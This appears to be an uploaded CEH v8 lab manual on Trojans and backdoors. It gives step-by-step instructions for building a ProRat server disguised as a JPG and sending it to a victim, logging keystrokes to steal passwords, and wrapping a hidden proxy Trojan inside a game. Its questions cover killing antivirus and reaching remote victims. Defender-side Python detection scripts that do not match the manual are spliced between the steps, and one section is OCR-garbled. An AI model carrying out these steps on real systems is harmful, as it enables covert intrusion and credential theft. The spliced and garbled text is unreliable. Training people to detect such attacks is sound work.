ceh v8 labs module 06 trojans and backdoors

CEH Lab Manual: Trojans and Backdoors, Module 06

Upload: mehrdad-jingoism

Post on 19-Jan-2015


CEH Lab Manual

Trojans and Backdoors

Module 06

Module 06 - Trojans and Backdoors

Trojans and Backdoors

A Trojan is a program that contains a malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario

According to Bank Info Security News (http://www.bankinfosecurity.com), Trojans pose serious risks to any personal and sensitive information stored on compromised Android devices, the FBI warns. But experts say any mobile device is potentially at risk because the real problem is malicious applications, which in an open environment are impossible to control. And anywhere malicious apps are around, so is the potential for financial fraud.

According to cyber security experts, the banking Trojan known as Citadel, an advanced variant of Zeus, is a keylogger that steals online-banking credentials by capturing keystrokes. Hackers then use stolen login IDs and passwords to access online accounts, take them over, and schedule fraudulent transactions. Hackers created this Trojan that is specifically designed for financial fraud and sold on the black market.

You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, the theft of valuable data from the network, and identity theft.

Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks.

The objectives of the lab include:

■ Creating a server and testing a network for attack

■ Detecting Trojans and backdoors

■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Lab Environment

To carry out this, you need:

■ A computer running Windows Server 2008 as Guest-1 in virtual machine

■ Windows 7 running as Guest-2 in virtual machine

■ A web browser with Internet access

■ Administrative privileges to run tools

ICON KEY: Valuable information / Test your knowledge / Web exercise / Workbook review

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

CEH Lab Manual Page 425


Lab Duration

Time: 40 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard disk.

With the help of a Trojan, an attacker gets access to stored passwords in a computer and would be able to read personal documents, delete files, display pictures, and/or show messages on the screen.

Lab Tasks

TASK 1: Overview

Pick an organization that you feel is worthy of your attention. This could be an educational institution, a commercial company, or perhaps a nonprofit charity.

Recommended labs to assist you with Trojans and backdoors:

■ Creating a Server Using the ProRat tool

■ Wrapping a Trojan Using OneFile EXE Maker

■ Proxy Server Trojan

■ HTTP Trojan

■ Remote Access Trojans Using Atelier Web Remote Commander

■ Detecting Trojans

■ Creating a Server Using the Theef

■ Creating a Server Using the Biodox

■ Creating a Server Using the MoSucker

■ Hack Windows 7 using Metasploit

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.


Lab

Creating a Server Using the ProRat Tool

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario

As more and more people regularly use the Internet, cyber security is becoming more important for everyone, and yet many people are not aware of it. Hackers are using malware to hack personal information, financial data, and business information by infecting systems with viruses, worms, and Trojan horses. But Internet security is not only about protecting your machine from malware; hackers can also sniff your data, which means that the hackers can listen to your communication with another machine. Other attacks include spoofing, mapping, and hijacking.

Some hackers may take control of your and many other machines to conduct a denial-of-service attack, which makes target computers unavailable for normal business, against high-profile web servers such as banks and credit card gateways.

You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks.

The objectives of the lab include:

■ Creating a server and testing the network for attack

■ Detecting Trojans and backdoors

■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Lab Environment

To carry this out, you need:

■ The ProRat tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat

■ A computer running Windows Server 2012 as Host Machine

■ A computer running Windows 8 (Virtual Machine)

■ Windows Server 2008 running in Virtual Machine

■ A web browser with Internet access

■ Administrative privileges to run tools

Lab Duration

Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Note: The versions of the created client or host and appearance of the website may differ from what is in the lab, but the actual process of creating the server and the client is the same as shown in this lab.

Lab Tasks

TASK 1: Create Server with ProRat

1. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat.

2. Double-click ProRat.exe in Windows 8 Virtual Machine.

3. Click Create ProRat Server to start preparing to create a server.


FIGURE 1.1: ProRat main window

4. The Create Server window appears.

FIGURE 1.2: ProRat Create Server window (panels: Notifications with ProConnective, Mail, ICQ Pager and CGI notification; General Settings; Bind with File; Server Extensions; Server Icon)

Password button: Retrieve passwords from many services, such as POP3 accounts, messenger, IE, mail, etc.

5. Click General Settings to change features, such as Server Port, Server Password, Victim Name, and the Port Number you wish to connect over the connection you have to the victim, or leave the settings default.

6. Uncheck the highlighted options as shown in the following screenshot.


FIGURE 1.3: ProRat Create Server - General Settings (Server Port, Server Password, Victim Name, and the install-time, invisibility and protection check boxes that step 6 unchecks)

Note: you can use Dynamic DNS to connect over the Internet by using no-ip account registration.

7. Click Bind with File to bind the server with a file; in this lab we are using the .jpg file to bind the server.

8. Check Bind server with a file. Click Select File, and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat\Images.

9. Select the Girl.jpg file to bind with the server.

FIGURE 1.4: ProRat binding with a file

Clipboard: To read data from random access memory.


10. Select Girl.jpg in the window and then click Open to bind the file.

11. Click OK after selecting the image for binding with a server.

12. In Server Extensions settings, select EXE (Has icon support) in Select Server Extension options.

VNC Trojan starts a VNC server daemon in the infected system.

File manager: To manage victim directory for add, delete, and modify.

FIGURE 1.5: ProRat binding an image


FIGURE 1.7: ProRat Server Extensions settings (EXE and SCR have icon support; PIF, COM and BAT have no icon support)

Give Damage: To format the entire system files.

13. In Server Icon select any of the icons, and click the Create Server button at the bottom right side of the ProRat window.

FIGURE 1.8: ProRat creating a server

14. Click OK after the server has been prepared, as shown in the following screenshot.

It connects to the victim using any VNC viewer with the password "secret."


FIGURE 1.9: ProRat server has been created in the same current directory

15. Now you can send the server file by mail or any communication media to the victim's machine as, for example, a celebration file to run.
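A defender-side triage check for the kind of file steps 7 to 14 produce (a PE executable with an image bound inside it, possibly carrying an image-style name), written here as an added example; it is not part of the CEH lab or of ProRat, and the byte strings it scans are constructed inline rather than taken from a real binder output.

```python
"""Triage heuristic for binder output: flag a PE executable that carries an
embedded JPEG/PNG or hides behind an image-style file name.
Added example; the PE blobs below are constructed and are not runnable programs."""
import struct
from dataclasses import dataclass, field
from typing import List, Tuple

PE_MAGIC = b"MZ"                       # DOS header signature
PE_SIG = b"PE\0\0"                     # NT header signature pointed to by e_lfanew
JPEG_SOI = b"\xff\xd8\xff"             # JPEG start-of-image marker
PNG_SIG = b"\x89PNG\r\n\x1a\n"         # PNG file signature
EXEC_EXTS = {".exe", ".scr", ".pif", ".com", ".bat"}   # extensions the lab's binder offers
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}


@dataclass
class Finding:
    path: str
    is_pe: bool
    embedded_images: List[Tuple[int, str]] = field(default_factory=list)
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def is_pe(data: bytes) -> bool:
    """True when data starts with 'MZ' and e_lfanew (offset 0x3C) points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != PE_MAGIC:
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == PE_SIG


def find_embedded_images(data: bytes, start: int = 0x40) -> List[Tuple[int, str]]:
    """Return (offset, kind) for every image signature found after the DOS header."""
    hits = []
    for sig, kind in ((JPEG_SOI, "jpeg"), (PNG_SIG, "png")):
        off = data.find(sig, start)
        while off != -1:
            hits.append((off, kind))
            off = data.find(sig, off + 1)
    return sorted(hits)


def triage(path: str, data: bytes) -> Finding:
    """Combine content checks (PE + embedded image) with name checks (extension games)."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = name.split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    finding = Finding(path=path, is_pe=is_pe(data))
    if not finding.is_pe:
        return finding                      # a genuine image never has a PE header
    finding.embedded_images = find_embedded_images(data)
    if finding.embedded_images:
        finding.reasons.append("PE carries embedded image data (binder pattern)")
    if ext in IMAGE_EXTS:
        finding.reasons.append("PE content behind an image extension")
    elif len(parts) >= 3 and "." + parts[-2] in IMAGE_EXTS and ext in EXEC_EXTS:
        finding.reasons.append("double extension: image name with executable suffix")
    return finding


def build_sample_pe(payload: bytes = b"") -> bytes:
    """Constructed minimal PE-shaped blob (DOS header, e_lfanew=0x40, 'PE\\0\\0',
    then payload). It is only enough for the header checks above."""
    hdr = bytearray(0x40)
    hdr[:2] = PE_MAGIC
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + PE_SIG + b"\0" * 28 + payload


# Constructed samples: a "bound" server with a JPEG appended, a plain EXE, a real JPEG.
JPEG_BODY = JPEG_SOI + b"\xe0\x00\x10JFIF\0"
BOUND_SAMPLE = build_sample_pe(b"stub" + JPEG_BODY)
CLEAN_EXE = build_sample_pe(b"just code")

if __name__ == "__main__":
    for fname, blob in (("binded_server.exe", BOUND_SAMPLE),
                        ("Girl.jpg.exe", BOUND_SAMPLE),
                        ("Girl.jpg", JPEG_BODY),
                        ("tool.exe", CLEAN_EXE)):
        f = triage(fname, blob)
        print(f"{fname:20} pe={f.is_pe} suspicious={f.suspicious} {f.reasons}")
```

The embedded-image check is a heuristic: a legitimate installer can also carry image resources, so treat a hit as a reason to inspect the file, not as proof of a Trojan.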

FIGURE 1.10: ProRat Create Server (binded_server.exe shown in the ProRat folder in Explorer)

16. Now go to Windows Server 2008 and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat.

17. Double-click binder_server.exe as shown in the following screenshot.

SHTTPD is a small HTTP server that can be embedded inside any program. It can be wrapped with a genuine program (game chess.exe). When executed, it turns a computer into an invisible web server.


FIGURE 1.11: ProRat folder on Windows Server 2008

18. Now switch to Windows 8 Virtual Machine and enter the IP address of Windows Server 2008 and the live port number as the default in the ProRat main window and click Connect.

19. In this lab, the IP address of Windows Server 2008 is (10.0.0.13).

Note: IP addresses might differ in classroom labs.

FIGURE 1.12: ProRat connecting to the infected server

20. Enter the password you provided at the time of creating the server and click OK.

ICMP Trojan: Covert channels are methods in which an attacker can hide data in a protocol that is undetectable.


FIGURE 1.13: ProRat connection window

21. Now you are connected to the victim machine. To test the connection, click PC Info and choose the system information as in the following figure.

FIGURE 1.14: ProRat connected computer window (PC Information received)

Covert channels rely on techniques called tunneling, which allow one protocol to be carried over another protocol.

22. Now click KeyLogger to steal user passwords for the online system.

TASK 2: Attack System Using Keylogger

FIGURE 1.15: ProRat KeyLogger button


23. The Key Logger window will appear.

FIGURE 1.16: ProRat KeyLogger window

24. Now switch to Windows Server 2008 machine and open a browser or Notepad and type any text.

FIGURE 1.17: Test typed in Windows Server 2008 Notepad

25. While the victim is writing a message or entering a user name and password, you can capture the log entity.

26. Now switch to Windows 8 Virtual Machine and click Read Log from time to time to check for data updates from the victim machine.

This Trojan works like a remote desktop access. The hacker gains complete GUI access of the remote system:

■ Infect victim's computer with server.exe and plant Reverse Connecting Trojan.

■ The Trojan connects to victim's Port to the attacker and establishing a reverse connection.

■ Attacker then has complete control over victim's machine.

Banking Trojans are programs that steal data from infected computers via web browsers and protected storage.


FIGURE 1.18: ProRat KeyLogger window (captured keystrokes received; buttons Read Log, Delete Log, Save as, Clear Screen, Help)

27. Now you can use a lot of features from ProRat on the victim's machine.

Note: ProRat Keylogger will not read special characters.

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Create a server with advanced options such as Kill AV-FW on start, disable Windows XP Firewall, etc., send it and connect it to the victim machine, and verify whether you can communicate with the victim machine.

2. Evaluate and examine various methods to connect to victims if they are in other cities or countries.


Tool/Utility | Information Collected/Objectives Achieved
ProRat Tool  | Successful creation of binded_server.exe
             | Output: PC Information
             | Computer Name: WIN-EGBHISG14L0
             | User Name: Administrator
             | Windows Ver:
             | Windows Language: English (United States)
             | Windows Path: c:\windows
             | System Path: c:\windows\system32
             | Temp Path: c:\Users\ADMINI~1\
             | Product ID:
             | Workgroup: NO
             | Data: 9/23/2012

Internet Connection Required

□ Yes ☑ No

Platform Supported

☑ Classroom ☑ iLabs


Lab

Wrapping a Trojan Using OneFile EXE Maker

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario

Sometimes an attacker makes a very secure backdoor even safer than the normal way to get into a system. A normal user may use only one password for using the system, but a backdoor may need many authentications or SSH layers to let attackers use the system. Usually it is harder to get into the victim system from installed backdoors compared with normal logging in. After getting control of the victim system by an attacker, the attacker installs a backdoor on the victim system to keep his or her access in the future. It is as easy as running a command on the victim machine. Another way the attacker can install a backdoor is using ActiveX. Whenever a user visits a website, embedded ActiveX could run on the system. Most websites show a message about running ActiveX for voice chat, downloading applications, or verifying the user.

In order to protect your system from attacks by Trojans, you need extensive knowledge of creating Trojans and backdoors and protecting the system from attackers.

You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

L a b O b j e c t i v e s

T h e o b j e c t i v e o t t i n s l a b i s t o h e l p s m d e n t s l e a r n t o d e t e c t T r o j a n a n d b a c k d o o r

a t t a c k s .

T h e o b j e c t i v e s o f t h e l a b i n c l u d e :

■ W r a p p i n g a T r o j a n w i t h a g a m e 1 1 1 W i n d o w s S e r v e r 2 0 0 8

■ R u n n i n g t h e T r o j a n t o a c c e s s t h e g a m e 0 1 1 t h e f r o n t e n d


Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

CEH Lab Manual Page 439


■ Analyzing the Trojan running in the back end

Lab Environment

To carry out this, you need:

■ The OneFileEXEMaker tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Wrapper Covert Programs\OneFileExeMaker

■ A computer running Windows Server 2012 (host)

■ Windows Server 2008 running in a virtual machine

■ If you decide to download the latest version, then screenshots shown in the lab might differ

■ Administrative privileges to run tools

Lab Duration

Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Note: The versions of the created client or host and appearance may differ from what is in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.

Lab Tasks

TASK 1: OneFile EXE Maker

1. Install OneFileEXEMaker on the Windows Server 2008 Virtual Machine.

FIGURE 3.1: OneFileEXEMaker Home screen (Senna Spy One EXE Maker 2000 2.0a: "Join many files and make a unique EXE file"; per-file columns Short File Name, Parameters, Open Mode, Copy To, Action; options Action (Open/Execute, Copy Only), Copy To (Windows, System, Temp, Root), Open Mode (Normal, Maximized, Minimized, Hide), Pack Files, Command Line Parameters)


2. Click the Add File button and browse to the CEH-Tools folder at the location Z:\CEHv8 Module 06 Trojans and Backdoors\Games\Tetris and add the Lazaris.exe file.

FIGURE 3.2: Adding the Lazaris game (LAZARIS.EXE listed with Open Mode Hide, Copy To System, Action Open/Execute)

Note: You can set various tool options such as Open Mode, Copy To and Action for each added file.

3. Click Add File and browse to the CEH-Tools folder at the location Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans and add the mcafee.exe file.

FIGURE 3.3: Adding the MCAFEE.EXE proxy server (MCAFEE.EXE listed with Copy To System, Action Open/Execute)

4. Select Mcafee and type 8080 in the Command Line Parameters field.


FIGURE 3.4: Assigning port 8080 to MCAFEE (Command Line Parameters 8080, Open Mode Hide, Copy To System)

5. Select Lazaris and check the Normal option in Open Mode.

FIGURE 3.5: Setting the Lazaris open mode (LAZARIS.EXE: Normal, System, Open/Execute; MCAFEE.EXE: parameter 8080, Hide, System, Open/Execute)

6. Click Save and browse to save the file on the desktop, and name the file Tetris.exe.


FIGURE 3.6: Trojan created (Save dialog on the desktop, file type Executables (*.exe))

7. Now double-click to open the Tetris.exe file. This will launch the Lazaris game on the front end; MCAFEE.EXE will run in the background.

FIGURE 3.7: Lazaris game

8. Now open Task Manager and click the Processes tab to check if McAfee is running.


FIGURE 3.8: MCAFEE.EXE in Task Manager (Processes tab with "Show processes from all users" enabled: LAZARIS.EXE and MCAFEE.EXE both listed under the Administrator account; 40 processes, CPU usage 2%, physical memory 43%)
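Task Manager only reveals the hidden process once the wrapper has already run. A static check a defender can make before executing a suspicious Tetris.exe is to look past the end of the PE image: a binder like the one used here keeps its own loader as the executable proper and appends the joined files after the last section, where the Windows loader never maps them. The Python below is an added example, not code from this lab or from the OneFile EXE Maker tool. It parses the section table to find where the mapped image ends, reports the size of the trailing overlay, and searches that overlay for further MZ/PE headers. The three fixtures (STUB, GAME, PAYLOAD) are constructed minimal PE images standing in for the wrapper stub, LAZARIS.EXE and MCAFEE.EXE; how the real tool lays out its payloads (and whether it compresses them when "Pack Files" is ticked) is an assumption this scan does not verify.

```python
"""Added example: spot a binder/wrapper output by looking past the end of the PE image.

A wrapper ships a small loader stub and appends the files it joins (here the
game and the proxy) after the stub's last section. The Windows loader never
maps that tail (the "overlay"), so a scanner can measure it and look for
further MZ/PE headers inside it.
"""
from __future__ import annotations

import struct


def pe_image_end(data: bytes) -> int | None:
    """Offset where the mapped PE image ends on disk, or None if not a PE.

    The end is the furthest PointerToRawData + SizeOfRawData over all
    section headers; anything after it is overlay data.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (num_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_hdr_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    sect_table = e_lfanew + 24 + opt_hdr_size
    end = sect_table + 40 * num_sections  # at least the headers themselves
    for i in range(num_sections):
        hdr = sect_table + 40 * i
        if hdr + 40 > len(data):
            return None  # truncated section table: not a loadable PE
        size_raw, ptr_raw = struct.unpack_from("<II", data, hdr + 16)
        end = max(end, ptr_raw + size_raw)
    return end


def find_embedded_pes(data: bytes, start: int = 0) -> list[int]:
    """Offsets (>= start) of every 'MZ' that is backed by a valid PE header."""
    hits = []
    pos = data.find(b"MZ", start)
    while pos != -1:
        if pe_image_end(data[pos:]) is not None:
            hits.append(pos)
        pos = data.find(b"MZ", pos + 2)
    return hits


def scan_wrapped(data: bytes) -> dict:
    """Summarise a file: is it a PE, how big is its overlay, what executables hide in it."""
    end = pe_image_end(data)
    if end is None:
        return {"is_pe": False, "overlay_bytes": 0, "embedded": []}
    return {
        "is_pe": True,
        "overlay_bytes": max(0, len(data) - end),
        "embedded": find_embedded_pes(data, end),
    }


def build_minimal_pe(section_bytes: bytes) -> bytes:
    """Constructed test fixture, not a real binary: DOS header, COFF header,
    a zeroed optional header and one .text section holding section_bytes."""
    e_lfanew, opt_hdr_size = 0x40, 0xE0
    sect_table = e_lfanew + 24 + opt_hdr_size
    raw_ptr = sect_table + 40  # section data follows the single section header
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_hdr_size, 0x102)
    section = b".text\0\0\0" + struct.pack(
        "<IIIIIIHHI", len(section_bytes), 0x1000, len(section_bytes), raw_ptr, 0, 0, 0, 0, 0x60000020
    )
    return dos + coff + b"\0" * opt_hdr_size + section + section_bytes


# Constructed sample in the shape the lab produces: loader stub + game + hidden proxy.
STUB = build_minimal_pe(b"\x90" * 16)     # stands in for the wrapper's own loader
GAME = build_minimal_pe(b"\x90" * 64)     # stands in for LAZARIS.EXE
PAYLOAD = build_minimal_pe(b"\xCC" * 32)  # stands in for MCAFEE.EXE
WRAPPED = STUB + GAME + PAYLOAD           # what a binder writes to Tetris.exe

if __name__ == "__main__":
    print(scan_wrapped(GAME))     # clean: overlay 0, nothing embedded
    print(scan_wrapped(WRAPPED))  # overlay 800 bytes, two PEs at 368 and 784
```

An overlay by itself is not proof of wrapping: Authenticode-signed binaries and self-extracting installers legitimately carry data there. A second well-formed PE header in the overlay is the stronger indicator, and a packer that encrypts its payloads defeats the MZ search entirely, which is why the runtime check in step 8 (an unexpected process that appeared alongside the game) still matters.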

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: OneFile EXE Maker
Information Collected/Objectives Achieved: Output: Using a backdoor, execute Tetris.exe

Questions

1. Use various other options for the Open Mode, Copy To and Action sections of OneFileEXEMaker and analyze the results.

2. How will you secure your computer from OneFileEXEMaker attacks?

Internet Connection Required: ☐ Yes ☑ No

Platform Supported: ☑ Classroom ☑ iLabs


Proxy Server Trojan

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario

You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks.

The objectives of this lab include:

• Starting the McAfee proxy

• Accessing the Internet using the McAfee proxy

Lab Environment

To carry out this, you need:

■ The McAfee Trojan located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans

■ A computer running Windows Server 2012 (host)

■ Windows Server 2008 running in a virtual machine

■ If you decide to download the latest version, then screenshots shown in the lab might differ

■ A web browser to access the Internet

■ Administrative privileges to run tools

Lab Duration

Time: 20 Minutes


Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Note: The versions of the created client or host and appearance may differ from what is in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.

Lab Tasks

TASK 1: Proxy server - Mcafee

1. In the Windows Server 2008 Virtual Machine, navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types, right-click Proxy Server Trojans and select CmdHere from the context menu.

FIGURE 4.1: Windows Server 2008: CmdHere (Explorer context menu on the Proxy Server Trojans folder)

2. Now type the command dir to check the folder contents.

FIGURE 4.2: Directory listing of the Proxy Server folder

3. The following image lists the directories and files in the folder.


Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans>dir
 Volume in drive Z has no label.
 Volume Serial Number is 1677-7DAC

 Directory of Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans

09/19/2012  01:07 AM    <DIR>          .
09/19/2012  01:07 AM    <DIR>          ..
02/17/2006  11:43 AM             5,328 mcafee.exe
09/19/2012  01:07 AM    <DIR>          W3bPr0xy Tr0j4nCr34t0r (Funny Name)
               1 File(s)          5,328 bytes
               3 Dir(s)  208,287,793,152 bytes free

Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans>

FIGURE 4.3: Contents of the Proxy Server folder

4. Type the command mcafee 8080 to run the service in Windows Server 2008.

FIGURE 4.4: Starting the mcafee tool on port 8080

5. The service has started on port 8080.

6. Now go to the Windows Server 2012 host machine and configure the web browser to access the Internet through port 8080.

7. In this lab launch Chrome, and select Settings as shown in the following figure.

Note: This process can be performed in any browser after setting the LAN settings for the respective browser.

FIGURE 4.5: Internet options of a browser in Windows Server 2012


8. Click the Show advanced settings link to view the Internet settings.

FIGURE 4.6: Advanced settings of the Chrome browser

9. In Network settings, click Change proxy settings.

FIGURE 4.7: Changing proxy settings of the Chrome browser

10. In the Internet Properties window, click LAN settings to configure proxy settings.


FIGURE 4.8: Internet Properties, Connections tab (Local Area Network (LAN) settings: "LAN Settings do not apply to dial-up connections. Choose Settings above for dial-up settings."; LAN settings button)

11. In the Local Area Network (LAN) Settings window, select the Use a proxy server for your LAN option in the Proxy server section.

12. Enter the IP address of Windows Server 2008, set the port number to 8080, and click OK.

FIGURE 4.9: Proxy settings of the LAN (Proxy server: "Use a proxy server for your LAN (These settings will not apply to dial-up or VPN connections)", Address 10.0.0.13, Port 8080; Automatic configuration: Automatically detect settings; note that automatic configuration may override manual settings)

13. Now access any web page in the browser (example: www.bbc.co.uk).


FIGURE 4.10: Accessing a web page using the proxy server

14. The web page will open.

15. Now go back to Windows Server 2008 and check the command prompt.

Administrator: C:\Windows\system32\cmd.exe - mcafee 8080

200: www.google.com: /complete/search?sugexp=chrome,mod=18&client=chrome&hl=en-US&q=bbc.co.uk
Accepting New Requests
301: bbc.co.uk: /
Accepting New Requests
200: www.bbc.co.uk: /
Accepting New Requests
200: static.bbci.co.uk: /frameworks/barlesque/2.10.0/desktop/3.5/style/main.css
Accepting New Requests
200: static.bbci.co.uk: /bbcdotcom/0.3.136/style/3pt_ads.css
Accepting New Requests

FIGURE 4.11: Background information on the proxy server (each relayed request is logged with its status code, host and path)

16. You can see that we have accessed the Internet using the proxy server Trojan.
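The console log above shows the proxy answering for any client that points a browser at it; nothing in steps 11 to 13 authenticated the Windows Server 2012 host. The Python below is an added example, not code from this lab or from the mcafee.exe tool, that turns that observation into a check a defender can run against a host found listening on 8080: it sends the same absolute-URI request line a LAN-proxy-configured browser sends (GET http://example.com/ HTTP/1.1) and treats a 2xx or 3xx answer as evidence of an open forward proxy. The two handler classes are constructed stand-ins for a proxy Trojan and an ordinary web server so the check can be exercised offline on localhost; the target URL and ports are assumptions.

```python
"""Added example: check whether host:port behaves as an open HTTP forward proxy.

A browser pointed at a LAN proxy sends its request line with an absolute URI,
e.g. 'GET http://www.bbc.co.uk/ HTTP/1.1', and the proxy fetches the page on
its behalf. A plain web server rejects such a request line or answers for
itself; a relaying proxy returns the origin's status.
"""
import http.client
import http.server
import socketserver
import threading
from typing import Optional, Tuple


def relay_status(host: str, port: int, target: str = "http://example.com/",
                 timeout: float = 3.0) -> Tuple[Optional[int], str]:
    """Send one absolute-URI GET through host:port and return (status, reason).

    status is None when nothing answered or the answer was not HTTP.
    """
    origin = target.split("/", 3)[2]  # the Host header a real browser would add
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", target, headers={"Host": origin, "Connection": "close"})
        resp = conn.getresponse()
        resp.read()  # drain so the socket can close cleanly
        return resp.status, resp.reason
    except (OSError, http.client.HTTPException) as exc:
        return None, type(exc).__name__
    finally:
        conn.close()


def is_open_proxy(host: str, port: int, target: str = "http://example.com/") -> bool:
    """True when host:port answered an absolute-URI request with a 2xx/3xx,
    i.e. it relayed (or claims to relay) for an arbitrary origin."""
    status, _ = relay_status(host, port, target)
    return status is not None and 200 <= status < 400


# --- constructed stand-ins so the check can be exercised offline ---------------

class _QuietHandler(http.server.BaseHTTPRequestHandler):
    def log_message(self, *args):  # keep the demo silent
        pass

    def _reply(self, status: int, body: bytes):
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


class FakeProxyTrojan(_QuietHandler):
    """Mimics a proxy Trojan: accepts any absolute-URI request as if it relayed it."""
    def do_GET(self):
        if self.path.startswith("http://"):
            self._reply(200, b"relayed")
        else:
            self._reply(400, b"expected absolute URI")


class FakePlainWebServer(_QuietHandler):
    """Mimics an ordinary web server: serves local paths, refuses to relay."""
    def do_GET(self):
        if self.path.startswith("http://"):
            self._reply(400, b"no proxy here")
        else:
            self._reply(200, b"local page")


def serve_in_background(handler) -> socketserver.TCPServer:
    """Bind the handler to an ephemeral localhost port and serve it on a daemon thread."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe_handler(handler) -> bool:
    """Stand up `handler` locally, probe it with is_open_proxy, tear it down."""
    srv = serve_in_background(handler)
    try:
        return is_open_proxy("127.0.0.1", srv.server_address[1])
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("proxy trojan relays:", probe_handler(FakeProxyTrojan))     # True
    print("plain server relays:", probe_handler(FakePlainWebServer))  # False
```

Run is_open_proxy(host, 8080) against the lab's Windows Server 2008 address to reproduce the finding. A 407 or 403 means a proxy that at least demands credentials or restricts origins, and no answer at all means the port is closed. A 200 only proves the service accepts proxy syntax; to prove it really relays, point target at a server you control and watch for the inbound request arriving from the suspect host, as the log in Figure 4.11 shows from the proxy's side.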

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: Proxy Server Trojan
Information Collected/Objectives Achieved: Output: Use the proxy server Trojan to access the Internet. Accessed web page: www.bbc.co.uk

Questions

